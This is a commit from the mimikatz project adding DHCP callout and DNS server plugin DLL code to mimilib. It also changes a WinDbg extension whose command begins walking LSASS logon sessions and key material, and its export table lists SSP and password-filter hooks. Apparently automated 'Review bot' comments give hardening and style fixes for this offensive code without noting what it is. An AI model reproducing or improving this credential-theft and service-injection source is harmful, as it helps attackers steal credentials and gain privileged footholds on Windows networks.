[new] mimilib now supports DHCP Callout, DNS Plugin, Coffee
gentilkiwi committed May 8, 2017
1 parent 4c70f14 commit 22eaf29
Showing 14 changed files with 2,458 additions and 19 deletions.



@@ -70,6 +70,10 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define MS_ENH_RSA_AES_PROV_XP L"Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
#endif

#ifndef SCARD_PROVIDER_CARD_MODULE
#define SCARD_PROVIDER_CARD_MODULE 0x80000001
#endif

#define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))

#define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))
@@ -12,7 +12,9 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global file
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF6-4DCA-9A60-6F4036929AEE}"
ProjectSection(SolutionItems) = preProject
inc\cardmod.h = inc\cardmod.h
inc\DbgHelp.h = inc\DbgHelp.h
inc\DhcpSSdk.h = inc\DhcpSSdk.h
inc\DsGetDC.h = inc\DsGetDC.h
inc\globals.h = inc\globals.h
inc\Midles.h = inc\Midles.h
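--- /dev/null
+++ b/kdhcp.c
@@ -0,0 +1,56 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kdhcp.h"
+
+HMODULE kdhcp_nextLibrary = NULL;
+LPDHCP_NEWPKT kdhcp_nextLibraryCalloutNewPkt = NULL;
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
+{
+if((ul_reason_for_call == DLL_PROCESS_DETACH) && kdhcp_nextLibrary)
+FreeLibrary(kdhcp_nextLibrary);
+return TRUE;
+}
+
+DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl)
+{
+LPDHCP_ENTRY_POINT_FUNC nextEntry;
+RtlZeroMemory(CalloutTbl, sizeof(DHCP_CALLOUT_TABLE));
+
+if(ChainDlls)
+if(kdhcp_nextLibrary = LoadLibrary(ChainDlls))
+if(nextEntry = (LPDHCP_ENTRY_POINT_FUNC) GetProcAddress(kdhcp_nextLibrary, DHCP_CALLOUT_ENTRY_POINT))
+nextEntry(ChainDlls + lstrlenW(ChainDlls) + 1, CalloutVersion, CalloutTbl);
+
+if(CalloutTbl->DhcpNewPktHook)
+kdhcp_nextLibraryCalloutNewPkt = CalloutTbl->DhcpNewPktHook;
+CalloutTbl->DhcpNewPktHook = kdhcp_DhcpNewPktHook;
+
+return ERROR_SUCCESS;
+}
+
+const BYTE macToBlack[][MAC_ADDRESS_SIZE] = {
+{0x00, 0x0c, 0x29, 0x00, 0x00, 0x00},
+{0x00, 0x50, 0x56, 0x00, 0x00, 0x00}
+};
+DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt)
+{
+DWORD status = ERROR_SUCCESS, m;
+*ProcessIt = TRUE;
+
+for(m = 0; m < ARRAYSIZE(macToBlack); m++)
+{
+if(RtlEqualMemory(*Packet + MAC_SOURCE_ADDRESS_OFFSET, macToBlack[m], MAC_ADDRESS_SIZE / 2)) // just the start of the address
+{
+*ProcessIt = FALSE;
+status = DHCP_DROP_INVALID;
+break;
+}
+}
+if(kdhcp_nextLibraryCalloutNewPkt && *ProcessIt)
+status = kdhcp_nextLibraryCalloutNewPkt(Packet, PacketSize, IpAddress, Reserved, PktContext, ProcessIt);
+return status;
+}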
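Review bot: `kdhcp_DhcpNewPktHook` compares three bytes at `*Packet + MAC_SOURCE_ADDRESS_OFFSET` without first checking that `*PacketSize` covers them, so a truncated datagram handed to the callout becomes an out-of-bounds read; guard the loop with `if(*PacketSize >= MAC_SOURCE_ADDRESS_OFFSET + MAC_ADDRESS_SIZE / 2)` before the comparison. `kdhcp_DhcpServerCalloutEntry` never looks at `CalloutVersion`, yet it zeroes the table with `sizeof(DHCP_CALLOUT_TABLE)` and fills `DhcpNewPktHook` assuming the layout it was compiled against; presumably a version the DLL was not built for should be rejected instead of silently accepted. The return value of `nextEntry` is also dropped, so a chained DLL that fails its own initialisation still has whatever hooks it managed to set forwarded to the server. The `MAC_ADDRESS_SIZE / 2` prefix length deserves a named constant and a comment such as `// match only the 3-byte vendor prefix of the client hardware address`.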
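--- /dev/null
+++ b/kdhcp.h
@@ -0,0 +1,14 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "utils.h"
+#include <dhcpssdk.h>
+
+#define MAC_ADDRESS_SIZE 6
+#define MAC_SOURCE_ADDRESS_OFFSET 28
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
+DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl);
+DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt);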
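Review bot: kdhcp.h has no include guard, while the kdns.h added in the same commit opens with `#pragma once`; add the same `#pragma once` after the licence comment so the two new headers agree. `MAC_SOURCE_ADDRESS_OFFSET 28` is undocumented; 28 is the offset of the `chaddr` (client hardware address) field in the BOOTP/DHCP fixed header, so `#define MAC_SOURCE_ADDRESS_OFFSET 28 // chaddr field of the BOOTP/DHCP fixed header` would explain both the value and why the name says "source". The `DllMain` prototype does not belong in a header; it is only called by the loader and can stay private to kdhcp.c.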
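--- /dev/null
+++ b/kdns.c
@@ -0,0 +1,30 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kdns.h"
+
+DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
+{
+return ERROR_SUCCESS;
+}
+
+DWORD WINAPI kdns_DnsPluginCleanup()
+{
+return ERROR_SUCCESS;
+}
+
+DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
+{
+FILE * kdns_logfile;
+#pragma warning(push)
+#pragma warning(disable:4996)
+if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
+#pragma warning(pop)
+{
+klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
+fclose(kdns_logfile);
+}
+return ERROR_SUCCESS;
+}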
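Review bot: `kdns_DnsPluginQuery` opens `kiwidns.log` through a relative path, so the log is created in whatever working directory the hosting DNS service happens to have; a fully qualified path, or one derived from the module's own location, would make where the query names end up deterministic. The C4996 pragma pair around the `_wfopen` call can go if the call becomes `if(!_wfopen_s(&kdns_logfile, L"kiwidns.log", L"a"))`, which also takes the assignment out of the condition. `kdns_DnsPluginCleanup()` declares an empty parameter list both here and in the kdns.h prototype; in C that is an unprototyped declaration, so write `kdns_DnsPluginCleanup(void)` in both places. `pDnsAllocateFunction` and `pDnsFreeFunction` are accepted by `kdns_DnsPluginInitialize` and ignored, which is fine for a log-only plugin but deserves a one-line comment saying so.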
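--- /dev/null
+++ b/kdns.h
@@ -0,0 +1,19 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "utils.h"
+
+#define PLUGIN_ALLOCATOR_FUNCTION PVOID
+#define PLUGIN_FREE_FUNCTION PVOID
+#define PDB_RECORD PVOID
+
+DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction);
+DWORD WINAPI kdns_DnsPluginCleanup();
+DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead);
+// DnsPluginQuery2
+// DnsPluginQueryZoneScope
+// DnsPluginQueryServerScope
+// DnsPluginQueryCacheScope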
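Review bot: `PLUGIN_ALLOCATOR_FUNCTION`, `PLUGIN_FREE_FUNCTION` and `PDB_RECORD` are spelled as `#define ... PVOID` with no explanation; presumably they stand in for DNS server plugin SDK types that are not available to this build, and kdns.c never dereferences any of them. Add a comment such as `// placeholders for the DNS plugin SDK types; kdns.c passes them through without dereferencing` and prefer `typedef PVOID PDB_RECORD;` so they are real type names rather than textual substitutions. The commented-out `DnsPluginQuery2` and `...Scope` names read as a TODO list; either label them as such or drop them.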
@@ -1,11 +1,20 @@
LIBRARY
EXPORTS
startW = kappfree_startW

SpLsaModeInitialize = kssp_SpLsaModeInitialize

InitializeChangeNotify = kfilt_InitializeChangeNotify
PasswordChangeNotify = kfilt_PasswordChangeNotify

WinDbgExtensionDllInit = WinDbgExtensionDllInit
ExtensionApiVersion = ExtensionApiVersion

mimikatz = mimikatz
WinDbgExtensionDllInit = kdbg_WinDbgExtensionDllInit
ExtensionApiVersion = kdbg_ExtensionApiVersion
coffee = kdbg_coffee
mimikatz = kdbg_mimikatz

DnsPluginInitialize = kdns_DnsPluginInitialize
DnsPluginCleanup = kdns_DnsPluginCleanup
DnsPluginQuery = kdns_DnsPluginQuery

DhcpServerCalloutEntry = kdhcp_DhcpServerCalloutEntry
DhcpNewPktHook = kdhcp_DhcpNewPktHook
@@ -88,6 +88,8 @@
</ItemGroup>
<ItemGroup>
<ClCompile Include="kappfree.c" />
<ClCompile Include="kdhcp.c" />
<ClCompile Include="kdns.c" />
<ClCompile Include="kfilt.c" />
<ClCompile Include="kssp.c" />
<ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.c" />
@@ -99,6 +101,8 @@
<ClCompile Include="utils.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="kdhcp.h" />
<ClInclude Include="kdns.h" />
<ClInclude Include="kfilt.h" />
<ClInclude Include="kssp.h" />
<ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.h" />
@@ -29,6 +29,8 @@
<ClCompile Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.c">
<Filter>sekurlsadbg</Filter>
</ClCompile>
<ClCompile Include="kdns.c" />
<ClCompile Include="kdhcp.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="utils.h" />
@@ -52,6 +54,8 @@
<ClInclude Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.h">
<Filter>sekurlsadbg</Filter>
</ClInclude>
<ClInclude Include="kdns.h" />
<ClInclude Include="kdhcp.h" />
</ItemGroup>
<ItemGroup>
<Filter Include="sekurlsadbg">
@@ -15,17 +15,12 @@ EXT_API_VERSION g_ExtApiVersion = {5 , 5 ,
, 0};
USHORT NtBuildNumber = 0;

LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void)
LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void)
{
return &g_ExtApiVersion;
}

VOID CheckVersion(void)
{
return;
}

VOID WDBGAPI WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
VOID WDBGAPI kdbg_WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
{
ExtensionApis = *lpExtensionApis;
NtBuildNumber = usMinorVersion;
@@ -80,7 +75,12 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonTime), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonServer)},
};

DECLARE_API(mimikatz)
DECLARE_API(kdbg_coffee)
{
dprintf("\n ( (\n ) )\n .______.\n | |]\n \\ /\n `----'\n");
}

DECLARE_API(kdbg_mimikatz)
{
ULONG_PTR pInitializationVector = 0, phAesKey = 0, ph3DesKey = 0, pLogonSessionList = 0, pLogonSessionListCount = 0, pSecData = 0, pDomainList = 0;
PLIST_ENTRY LogonSessionList;
@@ -59,10 +59,10 @@ typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
ULONG offsetToLogonServer;
} KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;

LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void);
VOID CheckVersion(void);
VOID WDBGAPI WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
DECLARE_API(mimikatz);
LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void);
VOID WDBGAPI kdbg_WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
DECLARE_API(kdbg_coffee);
DECLARE_API(kdbg_mimikatz);

VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
VOID kuhl_m_sekurlsa_genericKeyOutput(struct _KIWI_CREDENTIAL_KEY * key);
@@ -131,6 +131,8 @@ BOOL kull_m_crypto_close_hprov_delete_container(HCRYPTPROV hProv)
}
}
}
if(!status)
PRINT_ERROR_AUTO(L"CryptGetProvParam/CryptAcquireContextA");
return status;
}

@@ -554,9 +556,10 @@ BOOL kull_m_crypto_DerAndKeyToPfx(LPCVOID der, DWORD derLen, LPCVOID key, DWORD
CryptDestroyKey(hCryptKey);
}
else PRINT_ERROR_AUTO(L"CryptImportKey");
CryptReleaseContext(hCryptProv, 0);
if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
kull_m_crypto_close_hprov_delete_container(hCryptProv);
//CryptReleaseContext(hCryptProv, 0);
//if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
// PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
}
else PRINT_ERROR_AUTO(L"CryptAcquireContext");
LocalFree(infos.pwszContainerName);
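Review bot: The three commented-out lines after the `kull_m_crypto_close_hprov_delete_container(hCryptProv);` call are the code the call replaces and should be deleted rather than kept as comments; version control already records them. The helper returns a `BOOL` (see its definition in the hunk above) and its result is discarded here, so the caller cannot tell whether the temporary container that received the imported private key was actually removed; the helper does emit its own `PRINT_ERROR_AUTO`, so if that is considered sufficient a short comment saying so would help, otherwise the result belongs in the function's return status. The enclosing `kull_m_crypto_DerAndKeyToPfx` starts before this hunk and continues after it.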

